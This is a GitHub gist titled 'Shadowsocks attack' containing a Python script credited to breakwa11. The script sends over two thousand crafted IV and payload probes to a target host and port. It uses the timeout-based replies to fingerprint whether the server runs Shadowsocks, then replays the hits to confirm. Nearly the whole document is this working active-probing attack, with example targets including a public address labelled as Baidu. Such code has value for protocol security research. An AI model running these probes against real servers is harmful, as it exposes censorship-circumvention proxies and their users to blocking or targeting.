Created
August 21, 2016 07:49
-
-
Save bekcpear/cb5cc83dac9e83308ebee1d3a76a944b to your computer and use it in GitHub Desktop.
Shadowsocks attack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
#-*- coding: utf-8 -*- | |
''' | |
Copyleft (c) 2015 breakwa11 | |
https://github.com/breakwa11/shadowsocks-rss | |
''' | |
import logging | |
import socket | |
import time | |
import traceback | |
import os | |
import struct | |
import threading | |
# Tuning knobs read by scan().
# Number of extra probes scan() sends after the main scan_max_try ones.
iv_buffer_max_size = 256 # from ss-libev setting
# Number of main probes; hits whose index is >= this value are not replayed
# during scan()'s "Double check" phase.
scan_max_try = 256 * 7
# Initial value of the semaphore that limits how many TestThread workers
# may hold a slot at the same time.
max_thread_num = 32
def compat_ord(s):
    """Return the integer code of ``s``, passing plain ints through unchanged.

    Values whose exact type is ``int`` are returned as-is; anything else is
    handed to the saved builtin ``ord`` (``_ord``).
    """
    return s if type(s) is int else _ord(s)
def compat_chr(d):
    """Return the single-byte string for the integer ``d``.

    When ``bytes`` is ``str`` the saved builtin ``chr`` (``_chr``) is used;
    otherwise a one-element ``bytes`` object is built from ``d``.
    """
    return _chr(d) if bytes == str else bytes([d])
# Keep handles on the real builtins first, then shadow the module-level
# names ``ord`` and ``chr`` with the compat wrappers.
_ord, _chr = ord, chr
ord, chr = compat_ord, compat_chr
def to_bytes(s):
    """Return ``s`` UTF-8 encoded when it is a text ``str``, else unchanged.

    Encoding only happens when ``bytes`` and ``str`` are distinct types and
    the exact type of ``s`` is ``str``.
    """
    should_encode = bytes is not str and type(s) is str
    return s.encode('utf-8') if should_encode else s
def to_str(s):
    """Return ``s`` UTF-8 decoded when it is a ``bytes`` object, else unchanged.

    Decoding only happens when ``bytes`` and ``str`` are distinct types and
    the exact type of ``s`` is ``bytes``.
    """
    should_decode = bytes is not str and type(s) is bytes
    return s.decode('utf-8') if should_decode else s
def random_string(length):
    """Return ``length`` random bytes obtained from ``os.urandom``."""
    noise = os.urandom(length)
    return noise
def test_single(iv, ip, port, addrtype, attack_data, timeout = 10): | |
try: | |
addrs = socket.getaddrinfo(ip, port, 0, socket.SOCK_STREAM, socket.SOL_TCP) | |
af, socktype, proto, canonname, sa = addrs[0] | |
s = socket.socket(af, socket.SOCK_STREAM) | |
s.settimeout(timeout) | |
s.connect(sa) | |
s.send(iv + to_bytes(chr(addrtype)) + attack_data) | |
ok = False | |
try: | |
ret = s.recv(1024) | |
except socket.timeout: | |
ok = True | |
except: | |
pass | |
return ok | |
except: | |
pass | |
class TestThread(threading.Thread):
    """Worker thread that runs one probe and records it if it was a hit.

    Constructing an instance acquires one slot from ``semaphore`` (blocking
    the creating thread while none is free); ``run`` gives the slot back
    when it finishes, whether or not the probe raised.
    """

    def __init__(self, lock, semaphore, index, attack_ok_list, params):
        """Store the shared state and take a semaphore slot.

        Args:
            lock: lock guarding ``attack_ok_list``.
            semaphore: semaphore limiting the number of live workers.
            index: number of this probe, stored with a recorded hit.
            attack_ok_list: shared list that hits are appended to.
            params: positional arguments passed to ``test_single``;
                ``params[0]`` and ``params[3]`` are stored with a hit.
        """
        threading.Thread.__init__(self)
        self.lock = lock
        self.semaphore = semaphore
        self.index = index
        self.params = params
        self.attack_ok_list = attack_ok_list
        # Taken here rather than in run() so the creator is throttled.
        semaphore.acquire()

    def run(self):
        """Probe up to three times and record the first conclusive hit."""
        try:
            for _attempt in range(3):
                ok = test_single(*self.params)
                if ok is None:
                    # Inconclusive (probe not delivered): try again.
                    continue
                if ok:
                    with self.lock:
                        self.attack_ok_list.append([self.params[0], self.params[3], self.index])
                break
        finally:
            # Release the slot even on an unexpected error; otherwise the
            # code waiting on the semaphore would block forever.
            self.semaphore.release()
def scan(iv_len, addr, port):
    """Probe addr:port and print whether it looks like a Shadowsocks server.

    Phase 1 fires ``scan_max_try + iv_buffer_max_size`` probes through
    TestThread workers. Each probe uses an IV made of ``iv_len - 2`` random
    bytes plus the probe index packed as a big-endian 16-bit value. Probes
    that get no reply before the timeout are collected as hits.
    Phase 2 ("Double check") replays hits with different attack data; the
    first replay that again gets no reply makes the function return True.

    Args:
        iv_len: IV length in bytes for the cipher being tested.
        addr: target host.
        port: target TCP port.

    Returns:
        True if the target is reported as a Shadowsocks server, else False.
    """
    total_tries = scan_max_try + iv_buffer_max_size
    iv_prefix = random_string(iv_len - 2)
    hits = []
    addrtype = 0
    payload_len = 6
    payload = random_string(payload_len)
    gave_up = False
    hits_lock = threading.Lock()
    slots = threading.Semaphore(max_thread_num)

    for index in range(total_tries):
        if index % 100 == 20:
            print("%d%%" % (index * 100 / total_tries))
        # Stop early when far more probes "hit" than expected: either nearly
        # every finished probe so far, or more than the overall threshold.
        if ((index >= 8 + max_thread_num and len(hits) > index - max_thread_num)
                or (index > 128 and len(hits) > scan_max_try * 4 / 256)):
            gave_up = True
            break
        iv = iv_prefix + struct.pack('>H', index)
        # The constructor blocks while all semaphore slots are taken.
        prober = TestThread(hits_lock, slots, index, hits, (iv, addr, port, addrtype, payload))
        prober.start()

    print("Waiting response")
    # Taking every slot means every started worker has released its own.
    for _ in range(max_thread_num):
        slots.acquire()

    if gave_up or not hits:
        print("%s:%d is an unknown server" % (addr, port))
        return False

    print("Double check")
    second_payload = random_string(payload_len)
    while second_payload == payload:
        second_payload = random_string(payload_len)

    for hit_iv, hit_addrtype, hit_index in hits:
        # NOTE(review): hits are stored in completion order, so this break
        # may skip later entries with a smaller index -- confirm intent.
        if hit_index >= scan_max_try:
            break
        for _attempt in range(3):
            ok = test_single(hit_iv, addr, port, hit_addrtype, second_payload)
            if ok is not None:
                break
        if ok:
            print("%s:%d is a Shadowsocks server" % (addr, port))
            return True

    print("%s:%d is an unknown server" % (addr, port))
    return False
if __name__ == '__main__':
    # 99.91% success in theory.
    # The first argument is the IV length of the cipher under test.
    #scan(16, "123.125.114.144", 80) # test baidu
    #scan(16, "123.125.114.144", 443) # test baidu
    #scan( 8, "192.168.0.100", 1025) # test your target server (chacha20/salsa20/bf-cfb encryptor)
    #scan(12, "192.168.0.100", 1025) # test your target server (chacha20-ietf encryptor)
    target = (16, "127.0.0.1", 8001) # test your target server (rc4-md5/aes/camellia encryptor)
    scan(*target)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment